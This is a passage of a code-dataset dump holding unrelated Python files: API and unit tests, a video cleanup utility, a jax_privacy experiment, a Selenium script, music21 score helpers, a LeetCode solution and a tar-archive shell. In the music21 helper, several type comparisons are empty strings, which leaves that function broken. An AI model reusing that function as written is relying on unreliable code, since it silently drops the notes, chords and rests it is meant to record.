@classmethod\n def setUpClass(self):\n self.headers = headers\n self.host = host\n self.path = \"/api/icem-sms/activity/template/get\"\n # self.random = random.randint(1000,99999)\n self.sql_id = \"SELECT id FROM t_workflow_node_define WHERE node_name = '发短信' ORDER BY id DESC LIMIT 1;\"\n self.sql_activityId = \"SELECT activity_id FROM t_workflow_node_define WHERE node_name = '发短信' ORDER BY id DESC LIMIT 1;\"\n self.dbname = \"geek_icem_activity\"\n print(\"----------开始测试----------\")\n\n\n #获取发短信接口\n def test_smsTemplateGet(self):\n '''获取发短信接口'''\n self.url = self.host + self.path\n self.node_id = DB_ICEM_proc(self.dbname).get_vslues(self.sql_id)\n self.activity_id = DB_ICEM_proc(self.dbname).get_vslues(self.sql_activityId)\n # print(self.nodeDefineId)\n data = {\"id\":self.node_id,\"activityId\":self.activity_id,\"activityType\":\"INTELLIGENCE_MARKET\"}\n print(self.url)\n response = requests.post(url=self.url,data= json.dumps(data), headers=self.headers)\n print (response.text)\n assert response.json()['error'] == 0\n\n\n def tearDown(self):\n pass\n\nif __name__ == \"__main__\":\n sms = ICEM_Interface()","repo_name":"EmmySmith/autoInterfaceTest","sub_path":"test_interface/CEM/marketingManagement/marketingManagement/smsTemplateGet_test.py","file_name":"smsTemplateGet_test.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30990863669","text":"from datetime import datetime\nimport hashlib\nfrom datetime import datetime\nimport os\nimport glob\nimport logging\nimport shutil\nfrom app.config import (\n VIDEO_FILE_PATH, \n VIDEO_EXTRACT_PATH,\n VIDEO_KEEP_RECENT_DAYS)\nlogger = logging.getLogger('uvicorn')\n\n\n \ndef md5_id():\n str2hash = str(datetime.now().timestamp())\n return hashlib.md5(str2hash.encode()).hexdigest()\n\n\ndef remove_file(keep_recent_days = VIDEO_KEEP_RECENT_DAYS):\n video_glob = os.path.join(VIDEO_FILE_PATH, '*.mp4')\n vide_extract_glob = os.path.join(VIDEO_EXTRACT_PATH, '*')\n\n videofiles = glob.glob(video_glob)\n video_extract_files = glob.glob(vide_extract_glob)\n\n if len(videofiles) ==0 and len(video_extract_files) == 0:\n logger.info(\"No file or folder to remove\")\n\n for f in videofiles:\n modify_time = os.path.getmtime(f)\n modify_time = datetime.fromtimestamp(int(modify_time))\n if (datetime.now() - modify_time).days >= keep_recent_days:\n os.remove(f)\n logger.info(f\"Removing file {f}\")\n\n for folder in video_extract_files:\n modify_time = os.path.getmtime(folder)\n modify_time = datetime.fromtimestamp(int(modify_time))\n if (datetime.now() - modify_time).days >= keep_recent_days:\n shutil.rmtree(folder)\n logger.info(f\"Removing folder {folder}\")","repo_name":"Kira1108/AbnormalDetectApp","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31126501541","text":"#!/usr/bin/python3\n\"\"\"FileStorage class unittests file\"\"\"\nimport os\nimport unittest\nimport models\nfrom models.engine.file_storage import FileStorage\nfrom models.base_model import BaseModel\n\n\nclass TestFileStorageModel(unittest.TestCase):\n \"\"\"FileStorage class unittests\"\"\"\n def test_is_an_instance(self):\n \"\"\"check if my_class is an instance of BaseModel\"\"\"\n fs1 = FileStorage()\n self.assertIsInstance(fs1, FileStorage)\n\n def test_insert_attr(self):\n \"\"\"defining test suite\"\"\"\n FileStorage._FileStorage__file_path = 'file.json'\n FileStorage._FileStorage__objects = {}\n\n def test_file_path(self):\n \"\"\"tests that file path exists\"\"\"\n self.assertTrue(hasattr(FileStorage, '_FileStorage__file_path'))\n\n def test_file_obj(self):\n \"\"\"test that file exists\"\"\"\n self.assertTrue(hasattr(FileStorage, '_FileStorage__objects'))\n\n def test_file_path_value(self):\n \"\"\"test that file has values\"\"\"\n self.assertEqual(FileStorage._FileStorage__file_path, 'file.json')\n\n def test_objects_value(self):\n \"\"\"test that the objects had values\"\"\"\n self.assertEqual(FileStorage._FileStorage__objects, {})\n\n def test_file_path_type(self):\n \"\"\"test that the file path is a string\"\"\"\n self.assertTrue(isinstance(FileStorage._FileStorage__file_path, str))\n\n def test_objects_value(self):\n \"\"\"test that the returned objects is a dictionary\"\"\"\n self.assertTrue(isinstance(FileStorage._FileStorage__objects, dict))\n\n def test_all(self):\n \"\"\"testing all()\"\"\"\n fs2 = FileStorage()\n FileStorage._FileStorage__objects = {'k': 'j'}\n self.assertEqual(FileStorage._FileStorage__objects, fs2.all())\n\n def test_new(self):\n \"\"\"testing new()\"\"\"\n bm1 = BaseModel()\n cn = bm1.__class__.__name__\n k = cn + '.' + str(bm1.id)\n s = FileStorage()\n s.new(bm1)\n self.assertIn(k, FileStorage._FileStorage__objects)\n\n def test_save(self):\n \"\"\"testing save()\"\"\"\n bm1 = BaseModel()\n cn = bm1.__class__.__name__\n k = cn + '.' + str(bm1.id)\n s = FileStorage()\n s.new(bm1)\n s.save()\n with open('file.json') as file:\n self.assertTrue(isinstance(file.read(), str))\n\n def test_save2(self):\n \"\"\"testing save() part 2\"\"\"\n bm1 = BaseModel()\n cn = bm1.__class__.__name__\n k = cn + '.' + str(bm1.id)\n s = FileStorage()\n s.new(bm1)\n s.save()\n with open('file.json') as file:\n self.assertIn(k, file.read())\n\n def test_reload(self):\n \"\"\"testing reload\"\"\"\n bm1 = BaseModel()\n cn = bm1.__class__.__name__\n k = cn + '.' + str(bm1.id)\n s = FileStorage()\n s.new(bm1)\n s.save()\n self.assertTrue(os.path.exists('file.json'))\n\n def test_reload2(self):\n \"\"\"testing reald part 2\"\"\"\n FileStorage._FileStorage__objects = {}\n bm1 = BaseModel()\n cn = bm1.__class__.__name__\n k = cn + '.' + str(bm1.id)\n s = FileStorage()\n s.new(bm1)\n s.save()\n s.reload()\n self.assertIn(k, FileStorage._FileStorage__objects)\n\n def test_permissions_file(self):\n \"\"\"Test File test_file_storage.py permissions\"\"\"\n\n test_file = os.access(\"models/engine/file_storage.py\", os.R_OK)\n self.assertTrue(test_file, \"Read permissions\")\n test_file = os.access(\"models/engine/file_storage.py\", os.W_OK)\n self.assertTrue(test_file, \"Write Permissions\")\n test_file = os.access(\"models/engine/file_storage.py\", os.X_OK)\n self.assertTrue(test_file, \"Execute permissions\")\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kaelwebdev/AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26526184495","text":"import collections\nfrom typing import Iterable, Iterator\n\nimport chex\nimport haiku as hk\nimport jax\nfrom jax_privacy.experiments import image_data as data\nfrom jax_privacy.experiments.image_classification import config_base\nfrom jax_privacy.experiments.image_classification import forward\nfrom jax_privacy.experiments.image_classification import models\nfrom jax_privacy.src.training import experiment\nfrom jax_privacy.src.training import metrics as metrics_module\n\n\nclass Experiment(experiment.AbstractExperiment):\n \"\"\"Jaxline experiment.\n\n This class controls the training and evaluation loop at a high-level.\n \"\"\"\n\n def __init__(\n self,\n mode: str,\n init_rng: chex.PRNGKey,\n config: config_base.ExperimentConfig,\n ):\n \"\"\"Initializes experiment.\n\n Args:\n mode: 'train' or 'eval'.\n init_rng: random number generation key for initialization.\n config: ConfigDict holding all hyper-parameters of the experiment.\n \"\"\"\n # Unused since we rather rely on `config.random_seed`. The argument\n # `init_rng` is kept to conform to jaxline's expectation.\n del init_rng\n\n self.config = config\n\n self._forward_fn = forward.MultiClassForwardFn(\n net=hk.transform_with_state(self._model_fn))\n\n super().__init__(\n mode=mode,\n random_seed=self.config.random_seed,\n training_config=self.config.training,\n optimizer_config=self.config.optimizer,\n averaging_config=self.config.averaging,\n num_training_samples=self.config.data_train.config.num_samples,\n num_updates=self.config.num_updates,\n )\n\n @property\n def forward_fn(self) -> forward.MultiClassForwardFn:\n return self._forward_fn\n\n def _model_fn(self, inputs, is_training=False):\n model_kwargs = {\n 'num_classes': self.config.data_train.config.num_classes,\n **self.config.model.kwargs,\n }\n model_instance = models.get_model_instance(self.config.model.name,\n model_kwargs)\n return model_instance(\n inputs,\n is_training=is_training,\n )\n\n def _should_restore_model(self) -> bool:\n return bool(self.config.model.restore.path)\n\n def _restore_model(self):\n self._params, self._network_state = models.restore_from_path(\n restore_path=self.config.model.restore.path,\n params_key=self.config.model.restore.params_key,\n network_state_key=self.config.model.restore.network_state_key,\n layer_to_reset=self.config.model.restore.layer_to_reset,\n params_init=self._params,\n network_state_init=self._network_state,\n )\n\n def _build_train_input(self) -> Iterator[data.DataInputs]:\n \"\"\"Builds the training input pipeline.\"\"\"\n return self.config.data_train.load_dataset(\n batch_dims=(\n jax.local_device_count(),\n self.batching.batch_size_per_device_per_step,\n ),\n is_training=True,\n shard_data=True,\n )\n\n def _build_eval_input(self) -> Iterator[data.DataInputs]:\n \"\"\"Builds the evaluation input pipeline.\"\"\"\n return self.config.data_eval.load_dataset(\n batch_dims=(\n jax.process_count(),\n jax.local_device_count(),\n self.config.evaluation.batch_size,\n ),\n is_training=False,\n shard_data=False,\n max_num_batches=self.config.evaluation.max_num_batches,\n )\n\n def _eval_epoch(self, rng, unused_global_step):\n \"\"\"Evaluates an epoch.\"\"\"\n avg_metrics = collections.defaultdict(metrics_module.Avg)\n\n # Checkpoints broadcast for each local device, which we undo here since the\n # evaluation is performed on a single device (it is not pmapped).\n if isinstance(self._averaging_config.ema_coefficient, Iterable):\n ema_params = {\n f'ema_{ema_decay}': params_ema for ema_decay, params_ema in zip(\n self._averaging_config.ema_coefficient,\n self._params_ema,\n strict=True)\n }\n else:\n ema_params = {'ema': self._params_ema}\n params_dict = {\n 'last': self._params,\n **ema_params,\n 'polyak': self._params_polyak,\n }\n\n state = self._network_state\n num_samples = 0\n host_id = jax.process_index()\n\n # Iterate over the evaluation dataset and accumulate the metrics.\n for inputs in self._build_eval_input():\n rng, rng_eval = jax.random.split(rng)\n num_hosts, num_devices_per_host, batch_size_per_device, *_ = (\n inputs.image.shape)\n batch_size = num_hosts * num_devices_per_host * batch_size_per_device\n num_samples += batch_size\n local_inputs = jax.tree_map(lambda x: x[host_id], inputs)\n\n # Evaluate batch for each set of parameters.\n for params_name, params in params_dict.items():\n metrics = self.updater.evaluate(params, state, rng_eval, local_inputs)\n\n # Update accumulated average for each metric.\n for metric_name, val in metrics.scalars.items():\n avg_metrics[f'{metric_name}_{params_name}'].update(val, n=batch_size)\n\n metrics = {k: v.avg for k, v in avg_metrics.items()}\n metrics['num_samples'] = num_samples\n\n return metrics\n","repo_name":"deepmind/jax_privacy","sub_path":"jax_privacy/experiments/image_classification/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"18213818113","text":"# # wait until we see a skill\n# login_button = wait.until(\n# EC.presence_of_element_located((By.XPATH, \"//a[contains(text(), 'I ALREADY HAVE AN ACCOUNT')]\"))\n# )\n\n# # click the login button (it says \"I ALREADY HAVE AN ACCOUNT\")\n# login_button.click()\n\nfrom Screenshot import Screenshot\nfrom selenium import webdriver\n\nwith webdriver.Firefox() as driver: \n driver.get(\"https://www.skyscanner.com/transport/flights-from/ista/?adultsv2=1&cabinclass=economy&childrenv2=&ref=home&rtn=1&preferdirects=false&outboundaltsenabled=false&inboundaltsenabled=false&oym=2307&iym=2307&qp_prevScreen=HOMEPAGE\")\n driver.maximize_window()\n driver.implicitly_wait(15)\n ob = Screenshot.Screenshot()\n\n img_url = ob.full_screenshot(driver, save_path=r'.', image_name='myimage.png', is_load_at_runtime=True,\n load_wait_time=3)\n print(img_url)\n","repo_name":"Splintdewolfcry/IntroductionToSelenium","sub_path":"ScrapingLearnerScripts/couldbeuseful.py","file_name":"couldbeuseful.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23534315390","text":"import librosa\nfrom colorsys import rgb_to_hsv, hsv_to_rgb\nimport music21 as mu\nfrom midi2audio import FluidSynth\nimport pandas as pd\nimport numpy as np\nimport sympy as sp\nfrom IPython.display import HTML, IFrame\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.patches import Rectangle\nfrom IPython.display import Image\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Patch\n\n\n\ndef create_sound_file_from_midi(m21_data, file_name):\n m21_data.write('midi', fp = file_name + \".mid\")\n fs = FluidSynth()\n fs.midi_to_audio('./' + file_name + \".mid\", file_name + '.mp3')\n return(IPython.display.Audio(\"./\" + file_name + \".mp3\"))\n\n\n\ndef complementary(r, g, b):\n hsv = rgb_to_hsv(r, g, b)\n return hsv_to_rgb((hsv[0] + 0.5) % 1, hsv[1], hsv[2])\n\n\ndef createMatPlotLibAxisForScore(ax, x_limit, y_limit): \n ax.set_xticks(range(int(x_limit)))\n ax.set_yticks(range(int(y_limit)))\n [ax.xaxis.get_major_ticks()[i].tick1line.set_color(\"white\") for i in range(int(x_limit))]\n [ax.yaxis.get_major_ticks()[i].tick1line.set_color(\"white\") for i in range(int(y_limit))]\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.grid(color='k', linestyle='-', linewidth=.5)\n ax.tick_params(axis = \"both\", which = \"both\", bottom = False, top = False)\n \n return(ax)\n\n\ndef createScoreFormatting(ax1, yOffset):\n \n # formatting data\n text_kwargs = dict( fontsize=32, color='white')\n \n keyColorCoords = [((0, 1), 80, 1), ((0, 3), 80, 1), ((0, 6), 80, 1), ((0, 8), 80, 1), ((0, 10), 80, 1), \n ((0, 13), 80, 1),((0, 15), 80, 1),((0, 18), 80, 1),((0, 20), 80, 1),((0, 22), 80, 1),\n ((0, 25), 80, 1), ((0, 27), 80, 1), ((0, 30), 80, 1), ((0, 32), 80, 1), ((0, 34), 80, 1),\n ((0, 37), 80, 1), ((0, 39), 80, 1), ((0, 42), 80, 1), ((0, 44), 80, 1), ((0, 46), 80, 1),\n ((0, 49), 80, 1), ((0, 51), 80, 1), ((0, 54), 80, 1), ((0, 56), 80, 1), ((0, 58), 80, 1),\n ((0, 61), 80, 1), ((0, 63), 80, 1), ((0, 66), 80, 1), ((0, 68), 80, 1), ((0, 70), 80, 1),\n ((0, 73), 80, 1), ((0, 75), 80, 1), ((0, 78), 80, 1), ((0, 80), 80, 1), ((0, 82), 80, 1),\n ((0, 85), 80, 1), ((0, 87), 80, 1), ((0, 90), 80, 1), ((0, 92), 80, 1), ((0, 94), 80, 1),\n ((0, 97), 80, 1), ((0, 99), 80, 1), ((0, 102), 80, 1), ((0, 104), 80, 1), ((0, 106), 80, 1),\n ((0, 109), 80, 1), ((0, 111), 80, 1), ((5, 114), 80, 1), ((0, 116), 80, 1), ((0, 118), 80, 1)]\n\n\n \n # Draw black and white keys\n [ax1.add_patch(Rectangle((keyColorCoords[i][0][0],keyColorCoords[i][0][1] - yOffset), keyColorCoords[i][1], keyColorCoords[i][2], color=\"#EBECF0\", zorder = -10)) for i in range(len(keyColorCoords))]\n\n ax1.add_patch(Rectangle((74, 0), 10, 80, color = \"black\"))\n \n\n return(ax1)\n\n\ndef convertDataForScoreVisualisation(scoreDataAsDF, startMeasure, endMeasure):\n\n df1 = scoreDataAsDF[(scoreDataAsDF.measureNumber >= startMeasure) & (scoreDataAsDF.measureNumber <= endMeasure) & (scoreDataAsDF.midiNumber != -1)]\n\n offsetForStart = min(df1.offsetAsFloat)\n minMidiNumber = min(df1.midiNumber)\n maxMidiNumber = max(df1.midiNumber)\n \n df2 = df1[[\"instrument\", \"part\",\"measureNumber\", \"offsetAsFloat\", \"midiNumber\", \"nameWithOctave\", \"quarterLengthDurationAsFloat\", \"partColor\"]].copy().reset_index()\n\n df2['height'] = 1\n heightNormalize = df2.groupby(by=[\"offsetAsFloat\", \"midiNumber\"]).sum().reset_index()[['offsetAsFloat', 'midiNumber', 'height']]\n new_df = pd.merge(df2, heightNormalize, how='left', left_on=['offsetAsFloat','midiNumber'], right_on = ['offsetAsFloat','midiNumber'])\n df = new_df.sort_values(by = [ \"offsetAsFloat\", \"midiNumber\"]).reset_index()\n df[\"divider\"] = df.groupby((df[\"height_y\"]!=df[\"height_y\"].shift()).cumsum()).cumcount() + 1\n df['divider'] = np.where(df.height_y == 1,1, df.divider)\n df['width'] = df.height_x / df.height_y\n \n \n df['adjustedHeightOffset'] = ((df.height_x / df.height_y) * df.divider) - df.width\n \n df['new_col'] = list(zip(df[\"offsetAsFloat\"]-offsetForStart, (df[\"midiNumber\"] - minMidiNumber) + df['adjustedHeightOffset'] ))\n df['col2'] = list(zip(df[\"new_col\"], df[\"quarterLengthDurationAsFloat\"], df[\"width\"], df[\"partColor\"], df['nameWithOctave']))\n \n\n coords = df.col2.values\n\n return([coords, minMidiNumber, maxMidiNumber, df])\n\n\n\ndef visualizeScore(scoreData, fromMeasure = None, toMeasure = None, reduce = False):\n \n coords1 = convertDataForScoreVisualisation(scoreData, fromMeasure, toMeasure)\n\n text_kwargs = dict( fontsize=10, color='orange')\n\n legend_elements = [Line2D([0], [0], color='b', lw=4, label='Violin'),\n Line2D([0], [0], marker='o', color='w', label='Viola',\n markerfacecolor='g', markersize=15),\n Patch(facecolor='orange', edgecolor='r',\n label='Cello')]\n\n\n\n # DRAW NOTES\n fig, (ax1) = plt.subplots(1, 1, figsize=(20, 12))\n\n ax1 = createMatPlotLibAxisForScore(ax1, 16, (coords1[2] - coords1[1]) + 5)\n\n t = [ax1.add_patch(Rectangle(coords1[0][i][0], coords1[0][i][1], coords1[0][i][2], color = coords1[0][i][3])) for i in range(len(coords1[0]))]\n\n u = [ax1.text(coords1[0][j][0][0], coords1[0][j][0][1], coords1[0][j][4], **text_kwargs) for j in range(len(coords1[0]))]\n\n\n ax1.legend(handles=legend_elements, loc='upper right')\n\n f1 = createScoreFormatting(ax1, coords1[1])\n\n# THIS FUNCTION ASSUMES THAT YOU HAVE PARSED YOUR MUSICXML FILE USING THE COVERTER.PARSE MUSIC21 FUNCTION. \n# ONCE YOU HAVE CREATED PARSED TO A MUSIC21 OBJECT, JUST PASS THAT OBJECT INTO THIS FUNCTION\ndef convertScoreToDF(scoreData = None, scoreName = None, scoreMovement = None):\n # examine the list of parts\n partList = scoreData.getElementsByClass(mu.stream.Part)\n pList = []\n for i in range(0, len(partList)):\n pList.append(partList[i])\n \n \n events = []\n\n currentNumerator = None\n currentDenominator = None\n currentInstrument = None\n currentInstrumentName = None\n currentPartName = None\n\n\n for eachPart in pList:\n\n\n for el in eachPart.flatten():\n # note that there are all kinds of that you get hold of when iterating through this object - some of these are below (such as pitchname, midi number etc, but by looking at the music21Object you can see all the other info is available) \n eventDictionary = {}\n eventDictionary['offset'] = el.offset\n eventDictionary['quarterLengthDuration'] = el.duration.quarterLength\n eventDictionary['measureNumber'] = el.measureNumber\n eventDictionary['currentNumerator'] = currentNumerator\n eventDictionary['currentDenominator'] = currentDenominator\n eventDictionary['instrument'] = currentInstrumentName\n eventDictionary['part'] = currentPartName\n\n\n currentType = str(type(el))\n\n if currentType == \"\":\n\n currentNumerator = el.numerator\n currentDenominator = el.denominator\n\n if \"instrument\" in currentType:\n\n currentInstrumentName = el.instrumentName\n currentPartName = el.partName\n\n if currentType == \"\":\n #print(\"REST\")\n eventDictionary['nameWithOctave'] = \"NA\"\n eventDictionary['midiNumber'] = -1\n eventDictionary['fullName'] = \"Rest\"\n eventDictionary['name'] = \"NA\"\n eventDictionary['octave'] = \"NA\"\n events.append(eventDictionary)\n\n\n if currentType == \"\":\n eventDictionary['nameWithOctave'] = el.nameWithOctave\n eventDictionary['midiNumber'] = el.pitches[0].midi\n eventDictionary['fullName'] = el.pitches[0].fullName\n eventDictionary['name'] = el.pitches[0].name\n eventDictionary['octave'] = el.pitches[0].octave\n events.append(eventDictionary)\n\n elif currentType == \"\":\n \n\n for eachNote in el:\n \n tempEventDictionary = eventDictionary.copy()\n\n tempEventDictionary['nameWithOctave'] = eachNote.nameWithOctave\n tempEventDictionary['midiNumber'] = eachNote.pitches[0].midi\n tempEventDictionary['fullName'] = eachNote.pitches[0].fullName\n tempEventDictionary['name'] = eachNote.pitches[0].name\n tempEventDictionary['octave'] = eachNote.pitches[0].octave\n events.append(tempEventDictionary)\n \n \n scoreEventData = pd.DataFrame(events)\n scoreEventData['offsetAsFloat'] = scoreEventData['offset'].astype(float)\n scoreEventData['quarterLengthDurationAsFloat'] = scoreEventData.quarterLengthDuration.astype(float)\n cmap = plt.get_cmap('viridis')\n colors = cmap(np.linspace(0, 1, len(scoreEventData.part)))\n scoreEventData['partColor'] = colors.tolist()\n scoreEventData['scoreName'] = scoreName\n scoreEventData['movement'] = scoreMovement\n \n return(scoreEventData)\n\n\n\n## Beginnings of code for midi conversion\nfrom midiutil import MIDIFile\n\ndegrees = [60, 62, 64, 65, 67, 69, 71, 72] # MIDI note number\ntrack = 0\nchannel = 0\ntime = 0 # In beats\nduration = 1 # In beats\ntempo = 60 # In BPM\nvolume = 100 # 0-127, as per the MIDI standard\n\nMyMIDI = MIDIFile(1) # One track, defaults to format 1 (tempo track\n # automatically created)\nMyMIDI.addTempo(track,time, tempo)\n\nfor pitch in degrees:\n MyMIDI.addNote(track, channel, pitch, time, duration, volume)\n time = time + 1\n\nwith open(\"major-scale.mid\", \"wb\") as output_file:\n MyMIDI.writeFile(output_file)\n \n \n#fs = FluidSynth()\n#fs.midi_to_audio('./major-scale.mid', 'again.mp3')\n#import IPython\n\n#IPython.display.Audio('./again.mp3')","repo_name":"jgab3103/Jamie-Gabriel","sub_path":"MusicNotebooks/.ipynb_checkpoints/ScoreProcessingFunctions-checkpoint.py","file_name":"ScoreProcessingFunctions-checkpoint.py","file_ext":"py","file_size_in_byte":10126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37621987953","text":"from src.data.datagen import LoadData, DataGen\nfrom src.img2seq import Img2SeqModel\n\nfrom src.utils.lr_schedule import LRSchedule\nfrom src.utils.general import Config\nfrom src.evaluation.text import score_files\n\ndata = LoadData('./data/', 'images/', 'formulas.final.lst', 'formula_image_1to1.lst')\ntrain_set, val_set, test_set, vocab = data()\n\ntest_set = DataGen(test_set[0], test_set[1])\n#val_set = DataGen(val_set[0], val_set[1])\n\ndir_output = './results/large/'\n\nconfig_data = Config(dir_output + \"data.json\")\nconfig_vocab = Config(dir_output + \"vocab.json\")\nconfig_model = Config(dir_output + \"model.json\")\n\n#vocab = Vocab(config_vocab)\nmodel = Img2SeqModel(config_model, dir_output, vocab)\nmodel.build_pred()\nmodel.restore_session(dir_output + \"model.weights/\")\n\nconfig_eval = Config({\"dir_answers\": dir_output + \"formulas_test/\",\n \"batch_size\": 20})\n\nfiles, perplexity, alphas = model.write_prediction(config_eval, test_set)\nformula_ref, formula_hyp = files[0], files[1]\nprint(alphas[0][0])\n\n# score the ref and prediction files\nscores = score_files(formula_ref, formula_hyp)\nscores[\"perplexity\"] = perplexity\nmsg = \" - \".join([\"{} {:04.2f}\".format(k, v) for k, v in scores.items()])\nmodel.logger.info(\"- Test Txt: {}\".format(msg))\n\n\n","repo_name":"shengdie/img2tex","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29158174646","text":"# leetcode-43-字符串相乘.py\n# 题目描述\n# 提示帮助\n# 提交记录\n# 社区讨论\n# 阅读解答\n# 给定两个以字符串形式表示的非负整数 num1 和 num2,返回 num1 和 num2 的乘积,它们的乘积也表示为字符串形式。\n\n# 示例 1:\n\n# 输入: num1 = \"2\", num2 = \"3\"\n# 输出: \"6\"\n# 示例 2:\n\n# 输入: num1 = \"123\", num2 = \"456\"\n# 输出: \"56088\"\n# 说明:\n\n# num1 和 num2 的长度小于110。\n# num1 和 num2 只包含数字 0-9。\n# num1 和 num2 均不以零开头,除非是数字 0 本身。\n# 不能使用任何标准库的大数类型(比如 BigInteger)或直接将输入转换为整数来处理\n\n\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n # 参考 \n num1,num2 = num1[::-1],num2[::-1]\n result = [0]*(len(num1)+len(num2))\n\n for i in range(len(num1)):\n int1 = ord(num1[i])-ord('0')\n\n for j in range(len(num2)):\n int2 = ord(num2[j])-ord('0')\n\n tens,units = divmod(int1*int2,10)\n\n result[i+j] += units\n\n if result[i+j]>9:\n result[i+j+1] += result[i+j]//10\n result[i+j]%=10\n\n result[i+j+1] += tens\n if result[i+j+1]>9:\n result[i+j+2] += result[i+j+1]//10\n result[i+j+1] %= 10\n\n while len(result) > 1 and result[-1] ==0:\n result.pop()\n\n return \"\".join(map(str,result[::-1]))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # num1 = list(map(int,[c for c in reversed(num1)]))\n # num2 = list(map(int,[c for c in reversed(num2)]))\n\n # ans = []\n # up = 0\n # for c1,c2 in itertools.zip_longest(num1,num2,fillvalue=0):\n # tmp = c1*c2+up\n # up = 0\n\n # if tmp>9:\n # up=tmp/10\n # tmp=tmp%10\n\n # ans.append(tmp)\n\n # if up:\n # ans.append(up)\n\n # return \"\".join(list(map(str,reversed(ans))))\n\n","repo_name":"ZX1209/gl-algorithm-practise","sub_path":"leetcode-gl-python/leetcode-43-字符串相乘.py","file_name":"leetcode-43-字符串相乘.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9386809147","text":"import io\nfrom tarfile import TarFile, TarInfo, DIRTYPE\nfrom archive import Archive\n\n\nclass TarArchive(Archive):\n def __init__(self, archive_name: str) -> None:\n super().__init__(self)\n self.archive_name = archive_name\n self.tar_archive = TarFile(archive_name, 'r')\n\n def ls(self) -> list[str]:\n messages: list[str] = []\n for tinfo in self.tar_archive.getmembers():\n if self.current_dir != '' and (not tinfo.name.startswith(self.current_dir) or tinfo.name == self.current_dir):\n continue\n messages.append(\"%20s %12d\" % (tinfo.name[len(\n self.current_dir) + 1 if self.current_dir != '' else 0:], tinfo.size))\n return messages\n\n def cd(self, directory_name: str) -> str | None:\n if directory_name == '/':\n self.current_dir = ''\n self.depth = 0\n elif directory_name == '..':\n self.current_dir = '/'.join(self.current_dir.split('/')[:-2])\n self.depth -= 1\n else:\n directories = [\n x.name for x in self.tar_archive.getmembers() if x.isdir()]\n if directory_name in directories:\n self.current_dir = directory_name if self.current_dir == '' else self.current_dir + \\\n '/' + directory_name\n self.depth = (self.current_dir != '') + \\\n self.current_dir.count('/')\n else:\n return f'{directory_name}: No such directory'\n\n def cat(self, file_name: str) -> str:\n file_name = file_name if self.current_dir == '' else self.current_dir + '/' + file_name\n if file_name in [x.name for x in self.tar_archive.getmembers() if not x.isdir()]:\n member = [x for x in self.tar_archive.getmembers()\n if x.name == file_name][0]\n f = io.TextIOWrapper(\n self.tar_archive.extractfile(member), encoding='utf-8')\n return f.readlines()\n else:\n return ['No such file: ' + file_name]\n\n def mkdir(self, directory_name: str) -> str:\n t = TarInfo(directory_name)\n t.type = DIRTYPE\n self.tar_archive.close()\n self.tar_archive = TarFile(self.archive_name, 'a')\n self.tar_archive.addfile(t)\n self.tar_archive.close()\n self.tar_archive = TarFile(self.archive_name, 'r')\n","repo_name":"descenty/scm-3-sem","sub_path":"projects/vshell/tar_archive.py","file_name":"tar_archive.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28255563901","text":"import argparse\nimport math\nimport numpy as np\nfrom scipy import fftpack\nfrom PIL import Image\n\ndef load_quantization_table(component):\n # Quantization Table for: Photoshop - (Save For Web 080)\n # (http://www.impulseadventure.com/photo/jpeg-quantization.html)\n if component == 'lum':\n q = np.array([[2, 2, 2, 2, 3, 4, 5, 6],\n [2, 2, 2, 2, 3, 4, 5, 6],\n [2, 2, 2, 2, 4, 5, 7, 9],\n [2, 2, 2, 4, 5, 7, 9, 12],\n [3, 3, 4, 5, 8, 10, 12, 12],\n [4, 4, 5, 7, 10, 12, 12, 12],\n [5, 5, 7, 9, 12, 12, 12, 12],\n [6, 6, 9, 12, 12, 12, 12, 12]])\n elif component == 'chrom':\n q = np.array([[3, 3, 5, 9, 13, 15, 15, 15],\n [3, 4, 6, 11, 14, 12, 12, 12],\n [5, 6, 9, 14, 12, 12, 12, 12],\n [9, 11, 14, 12, 12, 12, 12, 12],\n [13, 14, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12],\n [15, 12, 12, 12, 12, 12, 12, 12]])\n else:\n raise ValueError((\n \"component should be either 'lum' or 'chrom', \"\n \"but '{comp}' was found\").format(comp=component))\n\n return q\n\n\ndef zigzag_points(rows, cols):\n # constants for directions\n UP, DOWN, RIGHT, LEFT, UP_RIGHT, DOWN_LEFT = range(6)\n\n # move the point in different directions\n def move(direction, point):\n return {\n UP: lambda point: (point[0] - 1, point[1]),\n DOWN: lambda point: (point[0] + 1, point[1]),\n LEFT: lambda point: (point[0], point[1] - 1),\n RIGHT: lambda point: (point[0], point[1] + 1),\n UP_RIGHT: lambda point: move(UP, move(RIGHT, point)),\n DOWN_LEFT: lambda point: move(DOWN, move(LEFT, point))\n }[direction](point)\n\n # return true if point is inside the block bounds\n def inbounds(point):\n return 0 <= point[0] < rows and 0 <= point[1] < cols\n\n # start in the top-left cell\n 